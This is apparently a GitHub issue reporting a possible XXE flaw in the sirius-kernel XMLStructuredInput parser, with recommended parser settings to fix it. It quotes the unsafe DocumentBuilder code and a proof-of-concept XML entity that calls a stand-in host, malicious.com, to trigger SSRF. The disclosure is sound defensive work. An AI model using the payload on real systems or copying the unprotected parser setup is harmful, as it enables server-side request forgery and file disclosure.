Potential XXE(XML External Entity injection) vulnerability in XMLStructuredInput.java

[JAckLosingHeart]

Hi team, there might be a potential XXE vulnerability but I'm not sure whether it's a actual risk or not, just creating a issue here for you to check
On https://github.com/scireum/sirius-kernel/blob/develop/src/main/java/sirius/kernel/xml/XMLStructuredInput.java#L38
function XMLStructuredInput()

A external XML is parsed with DocumentBuilder without security settings enabled:

       DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();
        
        if (namespaceContext != null) {
            factory.setNamespaceAware(true);
        }
        DocumentBuilder builder = factory.newDocumentBuilder();
        Document document = builder.parse(inputStream);

An malicious XML as input could be used to exploit the vulnerability. For example they could craft a poc.xml like this:

<?xml version="1.0" encoding="UTF-8"?> 
<!DOCTYPE root [<!ENTITY xxe SYSTEM "https://malicious.com/exploit">]> 
<root>&xxe;</root>

to trigger a SSRF

Attackers can also exploit this vulnerability to access sensitive files on the system, overload the system with malicious XML payloads and so on.

Fix recommendation would be using the following functions to disable DTD or external entities:
factory.setFeature(XMLConstants.FEATURE_SECURE_PROCESSING, true);
Or
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);